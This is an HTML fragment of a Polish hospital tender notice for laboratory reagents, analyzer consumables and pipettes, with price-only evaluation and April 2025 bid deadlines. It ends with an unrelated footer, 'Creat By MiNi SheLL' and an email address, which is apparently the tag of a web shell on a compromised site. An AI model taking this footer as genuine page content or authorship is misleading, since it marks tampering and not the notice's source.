szt.<br/>Pipeta jednokanałowa stałopojemnościowa 1000 μl 1	szt.<br/>Pipeta jednokanałowa zmiennoobjętościowa 20-200 μl 2	szt.<br/>Pipeta jednokanałowa zmiennoobjętościowa 10-100 μl 1	szt.<br/>Pipeta jednokanałowa zmiennoobjętościowa 1000-5000 μl 2	szt.<br/>białe jednorazowe płyty do oznaczania grup krwi na 30 testów ML Plate 6, (5x6 celek) z rowkiem wzmacniającym, BIAŁE ,pakowane w opakowania po 100 szt.	7	op. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet odczynnikowy kompatybilny z analizatorem ABL 90 FLEX Plus 15szt.<br/>Kaseta sensorowa kompatybilna z analizatorem ABL 90 FLEX Plus	15	szt.<br/>Wyłapywacze skrzepów kompatybilne z wejściem do kapilar gazometrycznych o objętości minimum 100ul, oraz wyjściem do wejścia dedykowany do analizatora ABL 90 FLEX Plus, pakowane po 250 szt.	1	op.<br/>Osłona do igły pobierającej kompatybilna z analizatorem ABL 90 FLEX Plus 2	szt.<br/>Igła pobierająca kompatybilna z analizatorem ABL 90 FLEX Plus	2	szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pak do stacji do oczyszczania wody typu Układ Smart Pack RiOX-DI 3UV 1	szt.<br/>Odczynnik do oznaczania albuminy z surowicy pacjenta, kompatybilny z analizatorem Cobas C111 - opakowania z 4 pojemnikami na 100 testów 2	op.<br/>Odczynnik do oznaczania fostatazy zasadowej z surowicy pacjenta, kompatybilny z analizatorem Cobas C111 - opakowania z 2 pojemnikami na 100 testów 2	op.<br/>Odczynnik do oznaczania aminotransferazy alaninowej z surowicy pacjenta, kompatybilny z analizatorem Cobas C111 - opakowania z 4 pojemnikami na 100 testów 3	op.<br/>Odczynnik do oznaczania amylazy całkowitej z surowicy pacjenta, kompatybilny z analizatorem Cobas C111 - opakowania z 2 pojemnikami na 100 testów 2	op.<br/>Odczynnik do oznaczania aminotransferazy asparaginowej z surowicy pacjenta, kompatybilny z analizatorem Cobas C111 - opakowania z 4 pojemnikami na 100 testów 3	op.<br/>Odczynnik do oznaczania bilirubiny całkowitej z surowicy pacjenta, kompatybilny z analizatorem Cobas C111 - opakowania z 4 pojemnikami na 100 testów	6	op.<br/>Odczynnik do oznaczania wapnia całkowitego z surowicy pacjenta, kompatybilny z analizatorem Cobas C111 - opakowania z 4 pojemnikami na 100 testów	6	op.<br/>Odczynnik do oznaczania cholesterolu całkowitego z surowicy pacjenta, kompatybilny z analizatorem Cobas C111 - opakowania z 4 pojemnikami na 100 testów	4	op.<br/>Odczynnik do oznaczania kreatyniny z surowicy pacjenta, kompatybilny z analizatorem Cobas C111 - opakowania z 4 pojemnikami na 100 testów 6	op.<br/>Odczynnik do oznaczania CRP z surowicy pacjenta, kompatybilny z analizatorem Cobas C111 - opakowania z 2 pojemnikami na 100 testów 11	op.<br/>Odczynnik do oznaczania gamma-glutamylotransferazy z surowicy pacjenta, kompatybilny z analizatorem Cobas C111 - opakowania z 2 pojemnikami na 100 testów	2	op.<br/>Odczynnik do oznaczania glukozy z surowicy pacjenta, kompatybilny z analizatorem Cobas C111 - opakowania z 4 pojemnikami na 100 testów 8 op.<br/>Odczynnik do oznaczania cholesterolu HDL z surowicy pacjenta, kompatybilny z analizatorem Cobas C111 - opakowania z 2 pojemnikami na 100 testów	2	op.<br/>Odczynnik do oznaczania żelaza z surowicy pacjenta, kompatybilny z analizatorem Cobas C111 - opakowania z 2 pojemnikami na 50 testów	2	op.<br/>Odczynnik do oznaczania magnezu z surowicy pacjenta, kompatybilny z analizatorem Cobas C111 - opakowania z 2 pojemnikami na 50 testów	2	op.<br/>Odczynnik do oznaczania białka całkowitego z surowicy pacjenta, kompatybilny z analizatorem Cobas C111 - opakowania z 4 pojemnikami na 100 testów	2	op.<br/>Odczynnik do oznaczania trójglicerydów z surowicy pacjenta, kompatybilny z analizatorem Cobas C111 - opakowania z 4 pojemnikami na 50 testów	4	op.<br/>Odczynnik do oznaczania mocznika z surowicy pacjenta, kompatybilny z analizatorem Cobas C111 - opakowania z 4 pojemnikami na 100 testów 5	op.<br/>Odczynnik do oznaczania kwasu moczowego z surowicy pacjenta, kompatybilny z analizatorem Cobas C111 - opakowania z 4 pojemnikami na 100 testów	4	op.<br/>Kalibrator uniwersalny do kalibracji oznaczeń kompatybilny z analizatorem Cobas C111 - opakowanie z 12 pojemnikami po 3ml	3	op.<br/>Kalibrator kalibracji oznaczeń CRP kompatybilny z analizatorem Cobas C111 - opakowanie z 5 pojemnikami po 1ml	2	op.<br/>Kalibrator do kalibracji oznaczeń HDL kompatybilny z analizatorem Cobas C111 - opakowanie z 3 pojemnikami po 1ml	2	op.<br/>Odczynnik do oznaczeń kontroli wewnątrzlaboratoryjnej na normalnym poziomie, kompatybilny z analizatorem Cobas C111 - opakowanie z 20 pojemnikami po 5ml 2	op.<br/>Odczynnik do oznaczeń kontroli wewnątrzlaboratoryjnej na patologicznym poziomie, kompatybilny z analizatorem Cobas C111 - opakowanie z 20 pojemnikami po 5ml 2	op.<br/>opakowanie kuwet pomiarowych kompatybilne z analizatorem Cobas C111, pakowane po 168 segmentów z 10 kuwetami 12	op.<br/>Opakowanie igieł dozujących kompatybilne z analizatorem Cobas C111, pakowane po 2 sztuki	2	op.<br/>Lampa halogenowa kompatybilna z analizatorem Cobas C111, 12V, 20W2	zt.<br/>Czyszczący płyn systemowy kompatybilny z analizatorem Cobas C111, opakowania po 1000ml 10	szt.<br/>filtry wodne kompatybilne z analizatorem Cobas C111 ,opakowania po 10 sztuk	2	op.<br/>Płyn mycia dodatkowego kompatybilny z analizatorem Cobas C111, opakowanie z 4 pojemnikami po 21ml 4	op.<br/>Diluent 9% NaCl kompatybilny z analizatorem Cobas C111, opakowanie z 4 pojemnikami po 12ml 1	op.<br/>opakowanie kominków kompatybilne z analizatorem Cobas C111	1	op. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Odczynnik do oznaczania APTT kompatybilny z analizatorem K 3002 Optic - opakowania z butelkami o pojemności 2ml. Opakowanie- 12 szt. 20	op.<br/>Chlorek wapnia służacy do oznaczania APTT kompatybilny z analizatorem K3002 Optic - opakowania z butelkami o pojemności 4ml. Opakowanie-12 szt. 10	op. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający wymaga, aby Wykonawca zawarł umowę w sprawie zamówienia publicznego wg wzoru stanowiącego Załącznik 3 do SWZ.<br/>2.	Zamawiający prześle umowę Wykonawcy, którego oferta została wybrana za najkorzystniejszą albo zaprosi go do swojej siedziby, celem zawarcia umowy. <br/>3.	W przypadku, gdy zostanie wybrana, jako najkorzystniejsza, oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, przed zawarciem umowy w sprawie zamówienia publicznego należy dostarczyć Zamawiającemu umowę regulującą współpracę tych Wykonawców.<br/>4.	W przypadku zawarcia umowy z Wykonawcą zagranicznym, umowa i wszelka korespondencja związana z realizacją zamówienia zostanie sporządzona i będzie prowadzona w języku polskim.<br/>5.	Warunki dokonywania zmian w umowach:<br/>- na podstawie art. 455 ust. 1 ustawy Zamawiający przewiduje możliwość wprowadzenia istotnych zmian postanowień zawartej umowy w stosunku do treści przedłożonej w niniejszym postępowaniu oferty, na podstawie której dokonano wyboru Wykonawcy w przypadkach, wymienionych w Załączniku 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-16 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://usorwzakopanem.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-16 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-05-16</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com